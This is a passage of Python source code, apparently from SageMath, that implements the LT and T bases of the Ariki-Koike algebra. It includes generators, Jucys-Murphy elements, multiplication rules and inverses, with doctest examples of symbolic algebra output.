Category of bases of Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) over ...
"""
return "Category of bases of %s" % self.base()
class ParentMethods:
r"""
This class collects code common to all the various bases. In most
cases, these are just default implementations that will get
specialized in a basis.
"""
def _repr_(self):
r"""
Text representation of this basis of Iwahori-Hecke algebra.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: H.T()
Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) ... in the T-basis
sage: H.LT()
Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) ... in the LT-basis
"""
return "%s in the %s-basis"%(self.realization_of(), self._realization_name())
def hecke_parameter(self):
r"""
Return the Hecke parameter `q` of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: LT.hecke_parameter()
q
"""
return self._q
q = hecke_parameter
def cyclotomic_parameters(self):
r"""
Return the cyclotomic parameters `u` of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: LT.cyclotomic_parameters()
(u0, u1, u2, u3, u4)
"""
return self._u
u = cyclotomic_parameters
@cached_method
def gens(self):
r"""
Return the generators of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: LT.gens()
(L1, L2, L3, T[1], T[2])
"""
return tuple(self.algebra_generators())
def dimension(self):
r"""
Return the dimension of ``self``.
The dimension of `H_{r,n}(q, u)` is `r^n n!`.
EXAMPLES::
sage: LT = algebras.ArikiKoike(8, 3).LT()
sage: LT.dimension()
3072
sage: LT = algebras.ArikiKoike(6, 3).LT()
sage: LT.dimension()
1296
sage: LT = algebras.ArikiKoike(3, 5).LT()
sage: LT.dimension()
29160
"""
from sage.arith.all import factorial
return self._r**self._n * factorial(self._n)
def some_elements(self):
r"""
Return a list of elements of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(4, 3).LT()
sage: LT.some_elements()
[1 + 2*T[2] + 3*T[1] + T[2,1],
L1, L2, L3, T[1], T[2], L1^2, L2^2]
"""
G = self.algebra_generators()
elts = [self.an_element()] + list(G)
elts += [self.L(1)**2]
if self._n > 1:
elts += [self.L(2)**(self._r//2)]
return elts
# -----------------------------------------------------
# Basis classes
# -----------------------------------------------------
class LT(_Basis):
r"""
The basis of the Ariki-Koike algebra given by monomials of the
form `L T`, where `L` is product of Jucys-Murphy elements and
`T` is a product of `\{ T_i | 0 < i < n \}`.
This was the basis defined in [AK1994]_ except using the
renormalized Jucys-Murphy elements.
"""
def __init__(self, algebra):
r"""
Initialize ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: TestSuite(LT).run()
sage: LT = algebras.ArikiKoike(1, 4).LT()
sage: TestSuite(LT).run()
sage: LT = algebras.ArikiKoike(2, 3).LT()
sage: TestSuite(LT).run()
sage: LT = algebras.ArikiKoike(3, 4).LT()
sage: TestSuite(LT).run() # long time
"""
_Basis.__init__(self, algebra, prefix='LT')
self._assign_names(self.algebra_generators().keys())
def _repr_term(self, m):
r"""
Return a string representation of the basis element indexed by ``m``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(4, 3).LT()
sage: LT._repr_term( ((1, 0, 2), Permutation([3,2,1])) )
'L1*L3^2*T[2,1,2]'
"""
gen_str = lambda e: '' if e == 1 else '^%s'%e
lhs = '*'.join('L%s'%(j+1) + gen_str(i)
for j,i in enumerate(m[0]) if i > 0)
redword = m[1].reduced_word()
if not redword:
if not lhs:
return '1'
return lhs
rhs = 'T[{}]'.format(','.join(str(i) for i in redword))
if not lhs:
return rhs
return lhs + '*' + rhs
def _latex_term(self, m):
r"""
Return a latex representation for the basis element indexed by ``m``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(4, 3).LT()
sage: LT._latex_term( ((1, 0, 2), Permutation([3,2,1])) )
'L_{1} L_{3}^{2} T_{2} T_{1} T_{2}'
"""
gen_str = lambda e: '' if e == 1 else '^{%s}'%e
lhs = ' '.join('L_{%s}'%(j+1) + gen_str(i)
for j,i in enumerate(m[0]) if i > 0)
redword = m[1].reduced_word()
if not redword:
if not lhs:
return '1'
return lhs
return lhs + ' ' + ' '.join("T_{%d}"%i for i in redword)
def _from_T_basis(self, t):
r"""
Return the image of the `T` basis element indexed
by ``t`` in ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(3, 3)
sage: LT = H.LT()
sage: T = H.T()
sage: all(LT(Li) == LT.L(i+1) for i,Li in enumerate(T.L()))
True
sage: all(LT(Ti) == LT.T(i) for i,Ti in enumerate(T.T()))
True
sage: all(LT(T(b)) == b for b in LT.basis()) # long time
True
sage: H = algebras.ArikiKoike(1, 3)
sage: LT = H.LT()
sage: T = H.T()
sage: all(LT(Li) == LT.L(i+1) for i,Li in enumerate(T.L()))
True
sage: all(LT(T(b)) == b for b in LT.basis()) # indirect doctest
True
"""
# Compute the corresponding reduced word for the first part
ret = self.one()
T = list(self._zero_tuple)
one = self.base_ring().one()
for i,k in enumerate(t[0]):
if k == 0:
continue
perm = self._Pn.prod(self._Pn.simple_reflection(j)
for j in range(1,i+1))
ret = ret * self._from_dict({(self._zero_tuple, perm): one},
remove_zeros=False, coerce=False)
T[0] = k
ret = ret * self._from_dict({(tuple(T), self._one_perm): one},
remove_zeros=False, coerce=False)
return ret * self._from_dict({(self._zero_tuple, t[1]): one},
remove_zeros=False, coerce=False)
@cached_method
def algebra_generators(self):
r"""
Return the algebra generators of ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: dict(LT.algebra_generators())
{'L1': L1, 'L2': L2, 'L3': L3, 'T1': T[1], 'T2': T[2]}
sage: LT = algebras.ArikiKoike(1, 4).LT()
sage: dict(LT.algebra_generators())
{'T1': T[1], 'T2': T[2], 'T3': T[3]}
"""
d = {}
if self._r != 1:
for i in range(self._n):
r = list(self._zero_tuple) # Make a copy
r[i] = 1
d['L%s'%(i+1)] = self.monomial( (tuple(r), self._one_perm) )
G = self._Pn.group_generators()
for i in range(1, self._n):
d['T%s'%i] = self.monomial( (self._zero_tuple, G[i]) )
return Family(sorted(d), lambda i: d[i])
def T(self, i=None):
r"""
Return the generator(s) `T_i` of ``self``.
INPUT:
- ``i`` -- (default: ``None``) the generator `T_i` or
if ``None``, then the list of all generators `T_i`
EXAMPLES::
sage: LT = algebras.ArikiKoike(8, 3).LT()
sage: LT.T(1)
T[1]
sage: LT.T()
[L1, T[1], T[2]]
sage: LT.T(0)
L1
"""
G = self.algebra_generators()
if i is None:
return [G['L1']] + [G['T%s'%j] for j in range(1, self._n)]
if i == 0:
return G['L1']
return G['T%s'%i]
def L(self, i=None):
r"""
Return the generator(s) `L_i`.
INPUT:
- ``i`` -- (default: ``None``) the generator `L_i` or
if ``None``, then the list of all generators `L_i`
EXAMPLES::
sage: LT = algebras.ArikiKoike(8, 3).LT()
sage: LT.L(2)
L2
sage: LT.L()
[L1, L2, L3]
sage: LT = algebras.ArikiKoike(1, 3).LT()
sage: LT.L(2)
u + (-u*q^-1+u)*T[1]
sage: LT.L()
[u,
u + (-u*q^-1+u)*T[1],
u + (-u*q^-1+u)*T[2] + (-u*q^-2+u*q^-1)*T[2,1,2]]
"""
G = self.algebra_generators()
if i is None:
if self._r == 1:
return [self._Li_power(j, 1) for j in range(1, self._n+1)]
return [G['L%s'%j] for j in range(1, self._n+1)]
if self._r == 1:
return self._Li_power(i, 1)
return G['L%s'%i]
@cached_method
def product_on_basis(self, m1, m2):
r"""
Return the product of the basis elements indexed
by ``m1`` and ``m2``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(6, 3).LT()
sage: m = ((1, 0, 2), Permutations(3)([2,1,3]))
sage: LT.product_on_basis(m, m)
q*L1*L2*L3^4
sage: LT = algebras.ArikiKoike(4, 3).LT()
sage: L1,L2,L3,T1,T2 = LT.algebra_generators()
sage: L1 * T1 * L1^2 * T1
q*L1*L2^2 + (1-q)*L1^2*L2*T[1]
sage: L1^2 * T1 * L1^2 * T1
q*L1^2*L2^2 + (1-q)*L1^3*L2*T[1]
sage: L1^3 * T1 * L1^2 * T1
(-u0*u1*u2*u3+u0*u1*u2*u3*q)*L2*T[1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3)+(-u0*u1*u2-u0*u1*u3-u0*u2*u3-u1*u2*u3)*q)*L1*L2*T[1]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3)+(u0*u1+u0*u2+u1*u2+u0*u3+u1*u3+u2*u3)*q)*L1^2*L2*T[1]
+ ((u0+u1+u2+u3)+(-u0-u1-u2-u3)*q)*L1^3*L2*T[1] + q*L1^3*L2^2
sage: L1^2 * T1 * L1^3 * T1
(-u0*u1*u2*u3+u0*u1*u2*u3*q)*L2*T[1]
+ ((u0*u1*u2+u0*u1*u3+u0*u2*u3+u1*u2*u3)+(-u0*u1*u2-u0*u1*u3-u0*u2*u3-u1*u2*u3)*q)*L1*L2*T[1]
+ ((-u0*u1-u0*u2-u1*u2-u0*u3-u1*u3-u2*u3)+(u0*u1+u0*u2+u1*u2+u0*u3+u1*u3+u2*u3)*q)*L1^2*L2*T[1]
+ q*L1^2*L2^3
+ ((u0+u1+u2+u3)+(-u0-u1-u2-u3)*q)*L1^3*L2*T[1]
+ (1-q)*L1^3*L2^2*T[1]
sage: L1^2 * T1*T2*T1 * L2 * L3 * T2
(q-2*q^2+q^3)*L1^2*L2*L3 - (1-2*q+2*q^2-q^3)*L1^2*L2*L3*T[2]
- (q-q^2)*L1^3*L3*T[1] + (1-2*q+q^2)*L1^3*L3*T[1,2]
+ q*L1^3*L2*T[2,1] - (1-q)*L1^3*L2*T[2,1,2]
sage: LT = algebras.ArikiKoike(2, 3).LT()
sage: L3 = LT.L(3)
sage: x = LT.an_element()
sage: (x * L3) * L3 == x * (L3 * L3)
True
"""
# Although it is tempting to make this recursive, some care must be
# taken here to ensure that the various "helper" methods return
# linear combinations of "standard" basis elements of the form
# (L,w), where L is an n-tuple and w is a permutation because
# otherwise we may end up in an infinite loop...
# Product is of the form L1*T1*L2*T2: separate the L's and permutations
L1,T1 = m1
L2,T2 = m2
if sum(L2) == 0:
# Compute and return the product of T1 and T2, whilst fixing L
return self._from_dict(self._product_LTwTv(L1, T1, T2),
remove_zeros=False, coerce=False)
# If T1 is trivial then we just have L1*L2*T2 we only need to rewrite
# all of the "large" powers that appear in L1*L2. Unfortunately, this
# will almost certainly introduce more T_w's and it will be recursive
# because L_n^r, for example, will introduce many powers of L_k for k<n.
if T1 == self._one_perm:
Lbig = list(self._zero_tuple) # separate the "big" and small
Lsmall = list(self._zero_tuple) # powers of the Lk's
for i in range(self._n):
s = L1[i] + L2[i]
if s < self._r:
Lsmall[i] = s
else:
Lbig[i] = s
if tuple(Lbig) == self._zero_tuple:
# if no big powers we only need to combine Lsmall and T2
return self.monomial((tuple(Lsmall), T2))
# The l variables all commute, so we can multiply them in any order
# that we like. For improved efficiency, however, we move the Ls to
# the left as soon as we can. For efficiency, we multiply the
# "big" powers in the order L_n^N L_{n-1}^N...L_1^N as this
# way we have to expand few powers the of the Lk's later.
return (self.monomial((tuple(Lsmall), self._one_perm))
* prod(self._Li_power(i+1, Lbig[i])
for i in reversed(range(self._n)) if Lbig[i] > 0)
* self.monomial((self._zero_tuple, T2))
)
# If we are still here then both T1 and L2 are non-trivial. Using the
# method _product_Tw_L we expand the product T1*L2 as a linear
# combination of standard basis elements using the method and then,
# recursively, multiply on the left and right by L1 and T2,
# respectively. In other words, we multiply as L1*(T1*L2)*T2.
return ( self.monomial((L1, self._one_perm))
* self._product_Tw_L(T1, L2)
* self.monomial((self._zero_tuple, T2)) )
def _product_LTwTv(self, L, w, v):
r"""
Return the product `L * T_w * Tv` as a linear combinations of
terms of the form `L*T_x`.
The main point of this method is that it computes the product
`L T_w T_v` and returns it as a linear combination of standard
basis elements. That is, terms of the form `L T_x`. The monomial
``L`` does not play a role in this calculation and, instead, it
is kept as a place holder for this "L-component" of the product.
For this calculation the most important point is that
.. MATH::
T_i T_v = \begin{cases}
T_{s_i v}, & \text{if } \ell(s_iv) > \ell(v),\\
q T_{s_i v} + (q-1)T_v, & \text{if } \ell(s_iv) < \ell(v).
\end{cases}
This observation is used to rewrite the product `L T_w T_v`
as a linear combination of standard basis elements.
.. WARNING::
This method is not intended to be called directly and, instead,
is used by :meth:`product_on_basis`.
INPUT:
- ``L`` -- an `n`-tuple
- ``w`` -- the permutation ``w``
- ``v`` -- the permutation ``v``
OUTPUT:
The corresponding element represented as a ``dict``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 4).LT()
sage: P4 = Permutations(4)
sage: H._from_dict( H._product_LTwTv((0, 3, 2, 4), P4([1,3,2,4]), P4([1,3,2,4])) )
q*L2^3*L3^2*L4^4 - (1-q)*L2^3*L3^2*L4^4*T[2]
sage: H._from_dict( H._product_LTwTv((0, 3, 2, 4), P4([1,3,2,4]), P4([1,3,4,2])) )
q*L2^3*L3^2*L4^4*T[3] - (1-q)*L2^3*L3^2*L4^4*T[2,3]
sage: H._from_dict( H._product_LTwTv((0, 3, 2, 4), P4([1,4,3,2]), P4([1,4,3,2])) )
q^3*L2^3*L3^2*L4^4 - (q^2-q^3)*L2^3*L3^2*L4^4*T[3]
- (q^2-q^3)*L2^3*L3^2*L4^4*T[2]
+ (q-2*q^2+q^3)*L2^3*L3^2*L4^4*T[2,3]
+ (q-2*q^2+q^3)*L2^3*L3^2*L4^4*T[3,2]
- (1-2*q+2*q^2-q^3)*L2^3*L3^2*L4^4*T[3,2,3]
"""
ret = {v: self.base_ring().one()}
qm1 = self._q - self.base_ring().one()
for i in reversed(w.reduced_word()):
temp = {} # start from 0
for p in ret:
c = ret[p]
# We have to flip the side due to Sage's
# convention for multiplying permutations
pi = p.apply_simple_reflection(i, side="left")
if p.has_descent(i, side="left"):
iaxpy(1, {p: c * qm1, pi: c * self._q}, temp)
else:
iaxpy(1, {pi: c}, temp)
ret = temp
return {(L, p): ret[p] for p in ret}
def _product_Tw_L(self, w, L):
r"""
Given a permutation ``w`` and a monomial ``L`` return the product
`T_w L` as a linear combination of terms of the form `L_v T_v`.
To do this we write `w = s_{i_1} \cdots s_{i_k}` and then push each
`T_{i_a}` past `L` using Lemma 3.2 of [MM1998]_ (cf. Lemma 3.3 and
Proposition 3.4 of [AK1994]_), which says
.. MATH::
T_i L_i^a L_{i+1}^b = L_i^b L_{i+1}^a T_i + \begin{cases}
(1-q) sum_{k=0}^{a-1} L_i^{a+k} L_{i+1}^{b-k}, &\text{if } a \leq b,\\
(q-1) sum_{k=0}^{b-1} L_i^{b+k} L_{i+1}^{a-k}, &\text{if } a \geq b.
\end{cases}
Of course, `T_i` commutes with `L_k`, for `k \neq i,i+1`.
This method is not intended to be called directly and, instead,
is used by :meth:`product_on_basis`.
INPUT:
- ``w`` -- a permutation
- ``L`` -- a tuple `(a_1, \ldots, a_n)`
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 4).LT()
sage: P4 = Permutations(4)
sage: H._product_Tw_L(P4([1,3,2,4]), (0,2,2,0))
L2^2*L3^2*T[2]
sage: H._product_Tw_L(P4([1,3,2,4]), (0,1,3,0))
-(1-q)*L2*L3^3 - (1-q)*L2^2*L3^2 + L2^3*L3*T[2]
sage: H._product_Tw_L(P4([1,3,2,4]), (0,3,1,0))
(1-q)*L2*L3^3 + L2*L3^3*T[2] + (1-q)*L2^2*L3^2
sage: H._product_Tw_L(P4([1,3,2,4]), (2,3,1,3))
(1-q)*L1^2*L2*L3^3*L4^3 + L1^2*L2*L3^3*L4^3*T[2] + (1-q)*L1^2*L2^2*L3^2*L4^3
"""
# initialize wL to L: this is what we will eventually return
wL = {(L, self._one_perm): self.base_ring().one()}
q = self._q
one = q.parent().one()
for i in w.reduced_word()[::-1]:
iL = {} # this will become T_i * L, written in standard form
for lv in wL:
c = wL[lv]
L = list(lv[0]) # make a copy
v = lv[1]
a, b = L[i-1], L[i]
L[i-1], L[i] = L[i], L[i-1] # swap L_i=L[i-1] and L_{i+1}=L[i]
# the term L_1^{a_1} ... L_i^{a_{i+1}} L_{i+1}^{a_i} ... L_n^{a_n} T_i T_v
# always appears
iaxpy(c, self._product_LTwTv(tuple(L), self._Pn.simple_reflections()[i], v), iL) # need T_i*T_v
if a < b:
Ls = [ list(L) for k in range(b-a) ] # make copies of L
for k in range(b-a):
Ls[k][i-1] = a + k
Ls[k][i] = b - k
c *= (q - one)
iaxpy(1, {(tuple(l), v): c for l in Ls}, iL)
elif a > b:
Ls = [ list(L) for k in range(a-b) ] # make copies of L
for k in range(a-b):
Ls[k][i-1] = b + k
Ls[k][i] = a - k
c *= (one - q)
iaxpy(1, {(tuple(l), v): c for l in Ls}, iL)
wL = iL # replace wL with iL and repeat
return self._from_dict(wL, remove_zeros=False, coerce=False)
@cached_method
def _Li_power(self, i, m):
r"""
Return `L_i^m`, where `m \geq 0`.
To compute `L_i^m` we use Corollary 3.4 of [MM1998]_ which says that
.. MATH::
L_i^m = q^{-1} T_{i-1} L_{i-1}^m T_{i-1}
+ (1 - q^{-1}) \sum_{c=1}^{m-1} L_i^c L_{i-1}^{m-c} T_{i-1}.
.. WARNING::
This function is used internally by the multiplication and
may return elements that are not in the basis. However
these will be eventually resolved after the product has
been computed.
sage: H = algebras.ArikiKoike(3, 2).LT()
sage: L2 = H.L(2)
sage: H._Li_power(2, 4)
((u0^2*u1*u2+u0*u1^2*u2+u0*u1*u2^2)) + ...
- (q^-1-1)*L1*L2^3*T[1] ...
- (q^-1-1)*L1^3*L2*T[1]
sage: H._Li_power(2, 4) == L2^4
False
sage: L2 * H._Li_power(2, 4) == L2^5
True
EXAMPLES::
sage: H = algebras.ArikiKoike(3, 3).LT()
sage: for i in range(1,4):
....: for m in range(4):
....: print('L_{}^{} = {}'.format(i,m,H._Li_power(i,m)))
L_1^0 = 1
L_1^1 = L1
L_1^2 = L1^2
L_1^3 = u0*u1*u2 + ((-u0*u1-u0*u2-u1*u2))*L1 + ((u0+u1+u2))*L1^2
L_2^0 = 1
L_2^1 = L2
L_2^2 = L2^2
L_2^3 = u0*u1*u2 + (-u0*u1*u2*q^-1+u0*u1*u2)*T[1]
+ ((-u0*u1-u0*u2-u1*u2))*L2 + ((u0+u1+u2))*L2^2
+ ((u0+u1+u2)*q^-1+(-u0-u1-u2))*L1*L2*T[1]
- (q^-1-1)*L1*L2^2*T[1] - (q^-1-1)*L1^2*L2*T[1]
L_3^0 = 1
L_3^1 = L3
L_3^2 = L3^2
L_3^3 = u0*u1*u2 + (-u0*u1*u2*q^-1+u0*u1*u2)*T[2]
+ (-u0*u1*u2*q^-2+u0*u1*u2*q^-1)*T[2,1,2]
+ ((-u0*u1-u0*u2-u1*u2))*L3 + ((u0+u1+u2))*L3^2
+ ((u0+u1+u2)*q^-1+(-u0-u1-u2))*L2*L3*T[2]
- (q^-1-1)*L2*L3^2*T[2] - (q^-1-1)*L2^2*L3*T[2]
+ ((u0+u1+u2)*q^-2+(-2*u0-2*u1-2*u2)*q^-1+(u0+u1+u2))*L1*L3*T[1,2]
+ ((u0+u1+u2)*q^-2+(-u0-u1-u2)*q^-1)*L1*L3*T[2,1,2]
- (q^-2-2*q^-1+1)*L1*L3^2*T[1,2] - (q^-2-q^-1)*L1*L3^2*T[2,1,2]
- (q^-2-2*q^-1+1)*L1*L2*L3*T[1,2] - (q^-2-2*q^-1+1)*L1^2*L3*T[1,2]
- (q^-2-q^-1)*L1^2*L3*T[2,1,2]
"""
# shorthand for returning a tuple of the form (0,...,a,b,...,0) with a,b
# in the (i-1)th and i-th positions, respectively
def Ltuple(a, b):
return tuple([b if j == i else a if j == i-1 else 0
for j in range(1,self._n+1)])
# return "small" powers of the generators without change
if m < self._r:
return self.monomial( (Ltuple(0, m), self._one_perm) )
if i > 1:
si = self._Pn.simple_reflections()[i-1]
qsum = self.base_ring().one() - self._q**-1
# by calling _Li_power we avoid infinite recursion here
return ( self.sum_of_terms( ((Ltuple(c, m-c), si), qsum) for c in range(1, m) )
+ self._q**-1 * self.T(i-1) * self._Li_power(i-1, m) * self.T(i-1) )
# now left with the case i = 1 and m >= r
if m > self._r:
return self.monomial((Ltuple(0, 1), self._one_perm)) * self._Li_power(i,m-1)
z = PolynomialRing(self.base_ring(), 'DUMMY').gen()
p = list(prod(z - val for val in self._u))#[:-1]
p.pop() # remove the highest power
zero = self.base_ring().zero()
return self._from_dict({(Ltuple(0, exp), self._one_perm): -coeff
for exp,coeff in enumerate(p) if coeff != zero},
remove_zeros=False, coerce=False)
@cached_method
def inverse_T(self, i):
r"""
Return the inverse of the generator `T_i`.
From the quadratic relation, we have
.. MATH::
T_i^{-1} = q^{-1} T_i + (q^{-1} - 1).
EXAMPLES::
sage: LT = algebras.ArikiKoike(3, 4).LT()
sage: [LT.inverse_T(i) for i in range(1, 4)]
[(q^-1-1) + (q^-1)*T[1],
(q^-1-1) + (q^-1)*T[2],
(q^-1-1) + (q^-1)*T[3]]
TESTS::
sage: LT = algebras.ArikiKoike(4, 4).LT()
sage: all(LT.inverse_T(i) * LT.T(i) == LT.one() for i in range(1, 4))
True
sage: all(LT.T(i) * LT.inverse_T(i) == LT.one() for i in range(1, 4))
True
"""
c = ~self._q - self.base_ring().one()
m = self.T(i).leading_support()
return self._from_dict({m: ~self._q, self.one_basis(): c})
class Element(CombinatorialFreeModule.Element):
def inverse(self):
r"""
Return the inverse if ``self`` is a basis element.
EXAMPLES::
sage: LT = algebras.ArikiKoike(3, 4).LT()
sage: t = LT.T(1) * LT.T(2) * LT.T(3); t
T[1,2,3]
sage: t.inverse()
(q^-3-3*q^-2+3*q^-1-1) + (q^-3-2*q^-2+q^-1)*T[3]
+ (q^-3-2*q^-2+q^-1)*T[2] + (q^-3-q^-2)*T[3,2]
+ (q^-3-2*q^-2+q^-1)*T[1] + (q^-3-q^-2)*T[1,3]
+ (q^-3-q^-2)*T[2,1] + (q^-3)*T[3,2,1]
"""
if len(self) != 1:
raise NotImplementedError("inverse only implemented for monomials")
l,w = self.support_of_term()
if sum(l) != 0:
raise NotImplementedError("inverse only implemented for monomials in T variables")
H = self.parent()
return ~self[l,w] * H.prod(H.inverse_T(i) for i in reversed(w.reduced_word()))
__invert__ = inverse
class T(_Basis):
r"""
The basis of the Ariki-Koike algebra given by monomials of the
generators `\{ T_i | 0 \leq i < n \}`.
We use the choice of reduced expression given by [BM1997]_:
.. MATH::
T_{1,a_1} \cdots T_{n,a_n} T_w,
where `T_{i,k} = T_{i-1} \cdots T_2 T_1 T_0^k` (note that
`T_{1,k} = T_0^k`) and `w` is a reduced expression of an
element in `\mathfrak{S}_n`.
"""
def __init__(self, algebra):
r"""
Initialize ``self``.
EXAMPLES::
sage: T = algebras.ArikiKoike(5, 3).T()
sage: TestSuite(T).run()
sage: T = algebras.ArikiKoike(1, 4).T()
sage: TestSuite(T).run()
sage: T = algebras.ArikiKoike(2, 3).T()
sage: TestSuite(T).run()
sage: T = algebras.ArikiKoike(3, 4).T()
sage: TestSuite(T).run() # long time
"""
_Basis.__init__(self, algebra, prefix='T')
self._assign_names(['T%s'%i for i in range(self._n)])
def _repr_term(self, t):
r"""
Return a string representation of the basis element indexed by ``m``.
EXAMPLES::
sage: T = algebras.ArikiKoike(4, 3).T()
sage: T._repr_term( ((1,0,2), Permutation([3,2,1])) )
'T[0,2,1,0,0,2,1,2]'
"""
redword = []
for i,k in enumerate(t[0]):
if k == 0:
continue
redword += list(reversed(range(1,i+1))) + [0]*k
redword += t[1].reduced_word()
if len(redword) == 0:
return "1"
return (self._print_options['prefix']
+ '[%s]'%','.join('%d'%i for i in redword))
def _latex_term(self, t):
r"""
Return a latex representation for the basis element indexed by ``m``.
EXAMPLES::
sage: T = algebras.ArikiKoike(4, 3).T()
sage: T._latex_term( ((1,0,2), Permutation([3,2,1])) )
'T_{0}T_{1}T_{0}T_{0}T_{2}T_{1}T_{2}'
"""
redword = []
for i,k in enumerate(t[0]):
if k == 0:
continue
redword += list(reversed(range(1,i))) + [0]*k
redword += t[1].reduced_word()
if len(redword) == 0:
return "1"
return ''.join("%s_{%d}"%(self._print_options['prefix'], i)
for i in redword)
def _from_LT_basis(self, m):
r"""
Return the image of the `LT` basis element indexed
by ``m`` in ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(4, 2)
sage: LT = H.LT()
sage: T = H.T()
sage: all(T(Li) == T.L(i+1) for i,Li in enumerate(LT.L()))
True
sage: all(T(Ti) == T.T(i) for i,Ti in enumerate(LT.T()))
True
Check that the products of elements agrees::
sage: type_A_words = [p.reduced_word() for p in Permutations(H._n)]
sage: def from_reduced_word(B, w):
....: t = B.T()
....: return B.prod(t[i] for i in w)
sage: all(T(from_reduced_word(LT, w)) == from_reduced_word(T, w)
....: for w in type_A_words)
True
Check that the composition of the morphisms is the identity::
sage: all(T(LT(b)) == b for b in T.basis()) # indirect doctest
True
"""
ret = self.prod(self.L(i+1)**k for i,k in enumerate(m[0]))
return ret * self.monomial( (self._zero_tuple, m[1]) )
@cached_method
def algebra_generators(self):
r"""
Return the algebra generators of ``self``.
EXAMPLES::
sage: T = algebras.ArikiKoike(5, 3).T()
sage: dict(T.algebra_generators())
{0: T[0], 1: T[1], 2: T[2]}
sage: T = algebras.ArikiKoike(1, 4).T()
sage: dict(T.algebra_generators())
{1: T[1], 2: T[2], 3: T[3]}
"""
start = 1 if self._r == 1 else 0
return Family(list(range(start, self._n)), self.T)
def T(self, i=None):
r"""
Return the generator(s) `T_i` of ``self``.
INPUT:
- ``i`` -- (default: ``None``) the generator `T_i` or if ``None``,
then the list of all generators `T_i`
EXAMPLES::
sage: T = algebras.ArikiKoike(8, 3).T()
sage: T.T(1)
T[1]
sage: T.T()
[T[0], T[1], T[2]]
sage: T = algebras.ArikiKoike(1, 4).T()
"""
if i is None:
return [self.T(j) for j in range(self._n)]
if i == 0:
return self.monomial( ((1,) + self._zero_tuple[1:], self._one_perm) )
s = self._Pn.simple_reflections()
return self.monomial( (self._zero_tuple, s[i]) )
@cached_method
def L(self, i=None):
r"""
Return the Jucys-Murphy element(s) `L_i`.
The Jucys-Murphy element `L_i` is defined as
.. MATH::
L_i = q^{-i+1} T_{i-1} \cdots T_1 T_0 T_1 \cdots T_{i-1}
= q^{-1} T_{i-1} L_{i-1} T_{i-1}.
INPUT:
- ``i`` -- (default: ``None``) the Jucys-Murphy element `L_i`
or if ``None``, then the list of all `L_i`
EXAMPLES::
sage: T = algebras.ArikiKoike(8, 3).T()
sage: T.L(2)
(q^-1)*T[1,0,1]
sage: T.L()
[T[0], (q^-1)*T[1,0,1], (q^-2)*T[2,1,0,1,2]]
sage: T0,T1,T2 = T.T()
sage: q = T.q()
sage: T.L(1) == T0
True
sage: T.L(2) == q^-1 * T1*T0*T1
True
sage: T.L(3) == q^-2 * T2*T1*T0*T1*T2
True
sage: T = algebras.ArikiKoike(1, 3).T()
sage: T.L(2)
u + (-u*q^-1+u)*T[1]
sage: T.L()
[u,
u + (-u*q^-1+u)*T[1],
u + (-u*q^-1+u)*T[2] + (-u*q^-2+u*q^-1)*T[2,1,2]]
TESTS:
Check that the Jucys-Murphy elements form a commutative
subring::
sage: T = algebras.ArikiKoike(8, 4).T()
sage: L = T.L()
sage: all(x*y == y*x for x in L for y in L)
True
sage: T = algebras.ArikiKoike(2, 3).T()
sage: L = T.L()
sage: all(x*y == y*x for x in L for y in L)
True
sage: T = algebras.ArikiKoike(1, 4).T()
sage: L = T.L()
sage: all(x*y == y*x for x in L for y in L)
True
"""
if i is None:
return [self.L(j) for j in range(1, self._n+1)]
if i == 1:
if self._r == 1:
return self.from_base_ring(self._u[0])
else:
return self.T(0)
T = self.T()
return self._q**-1 * T[i-1] * self.L(i-1) * T[i-1]
@cached_method
def product_on_basis(self, m1, m2):
r"""
Return the product of the basis elements indexed
by ``m1`` and ``m2``.
EXAMPLES::
sage: T = algebras.ArikiKoike(2, 3).T()
sage: T0, T1, T2 = T.T()
sage: T.product_on_basis(T0.leading_support(), T1.leading_support())
T[0,1]
sage: T1 * T2
T[1,2]
sage: T2 * T1
T[2,1]
sage: T2 * (T2 * T1 * T0)
-(1-q)*T[2,1,0] + q*T[1,0]
sage: (T1 * T0 * T1 * T0) * T0
(-u0*u1)*T[1,0,1] + ((u0+u1))*T[0,1,0,1]
sage: (T0 * T1 * T0 * T1) * (T0 * T1)
(-u0*u1*q)*T[1,0] + (u0*u1-u0*u1*q)*T[1,0,1]
+ ((u0+u1)*q)*T[0,1,0] + ((-u0-u1)+(u0+u1)*q)*T[0,1,0,1]
sage: T1 * (T0 * T2 * T1 * T0)
T[1,0,2,1,0]
sage: (T1 * T2) * (T2 * T1 * T0)
-(1-q)*T[2,1,0,2] - (q-q^2)*T[1,0] + q^2*T[0]
sage: (T2*T1*T2) * (T2*T1*T0*T1*T2)
-(q-q^2)*T[2,1,0,1,2] + (1-2*q+q^2)*T[2,1,0,2,1,2]
- (q-q^2)*T[1,0,2,1,2] + q^2*T[0,2,1,2]
We check some relations::
sage: T0 * T1 * T0 * T1 == T1 * T0 * T1 * T0
True
sage: T1 * T2 * T1 == T2 * T1 * T2
True
sage: (T1 * T0) * T0 == T1 * (T0 * T0)
True
sage: (T.L(1) * T.L(2)) * T.L(2) - T.L(1) * (T.L(2) * T.L(2))
0
sage: (T.L(2) * T.L(3)) * T.L(3) - T.L(2) * (T.L(3) * T.L(3))
0
TESTS::
sage: T = algebras.ArikiKoike(2, 3).T()
sage: T0, T1, T2 = T.T()
sage: (T1 * T0 * T1) * (T0 * T0)
(-u0*u1)*T[1,0,1] + ((u0+u1))*T[0,1,0,1]
